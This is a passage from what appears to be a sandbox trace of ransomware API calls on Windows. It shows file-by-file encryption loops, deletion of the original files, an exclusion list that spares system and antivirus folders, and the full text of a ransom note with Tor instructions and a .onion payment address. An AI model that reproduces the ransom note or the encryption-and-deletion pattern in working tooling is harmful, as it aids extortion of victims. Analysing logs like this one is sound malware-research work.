lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.414] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.414] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.414] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.414] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.414] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.414] GetLastError () returned 0x0 [0148.414] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.415] GetLastError () returned 0x0 [0148.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.415] GetLastError () returned 0x0 [0148.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.415] GetLastError () returned 0x0 [0148.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.415] GetLastError () returned 0x0 [0148.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.415] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.415] GetLastError () returned 0x0 [0148.415] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.415] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.416] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.416] GetLastError () returned 0x0 [0148.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.416] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.416] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui")) returned 0x20 [0148.416] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.416] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned 1 [0148.416] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui")) returned 0 [0148.417] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" [0148.417] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB") returned 1 [0148.417] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\.xXB6C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\.xxb6c0.tmp")) returned 0xb6c0 [0148.417] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\.xXB6C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\.xxb6c0.tmp"), dwFlags=0x1) returned 0 [0148.417] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\.xXB6C0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\.xxb6c0.tmp")) returned 1 [0148.418] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0148.418] wcslen (_String="OK") returned 0x2 [0148.418] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.418] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.418] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0148.418] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0148.418] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0148.418] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.418] GetLastError () returned 0x12 [0148.418] FindClose (in: hFindFile=0x9ad738 | out: hFindFile=0x9ad738) returned 1 [0148.418] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-gb\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.418] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.419] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.419] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.419] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.419] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.exe") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.dll") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.lnk") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.bat") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.ini") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.msi") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*.scf") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*pagefile.sys*") returned 0 [0148.419] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*AppData*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\winrar\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\java\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\windows\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\ESET\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\AVG\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*Atheros*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*Realtek*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*bootmgr*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*boot*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*boot*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*IO.SYS*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*ntldr*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*chrome*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*opera*") returned 0 [0148.420] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", pszSpec="*firefox*") returned 0 [0148.420] wcslen (_String="\\\\?\\") returned 0x4 [0148.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad438 [0148.421] wcscmp (_String1=".", _String2=".") returned 0 [0148.421] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.421] wcscmp (_String1="..", _String2=".") returned 1 [0148.422] wcscmp (_String1="..", _String2="..") returned 0 [0148.422] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*NMCRYPT") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*Recovers your files.html") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.exe") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.dll") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.lnk") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.bat") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.ini") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.msi") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*.scf") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*pagefile.sys*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*NTUSER.DAT*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*AppData*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\winrar\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\java\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\windows\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\ESET\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\AVG\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\AVIRA\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*Atheros*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*Realtek*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*bootmgr*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*boot*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*boot*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*CONFIG.SYS*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*IO.SYS*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*MSDOS.SYS*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*NTDETECT.COM*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*ntldr*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*chrome*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*opera*") returned 0 [0148.422] PathMatchSpecW (pszFile="boxed-correct.avi", pszSpec="*firefox*") returned 0 [0148.422] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi", pszSpec="*") returned 1 [0148.422] strlen (_Str="NMoreira") returned 0x8 [0148.422] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.423] CryptGenRandom 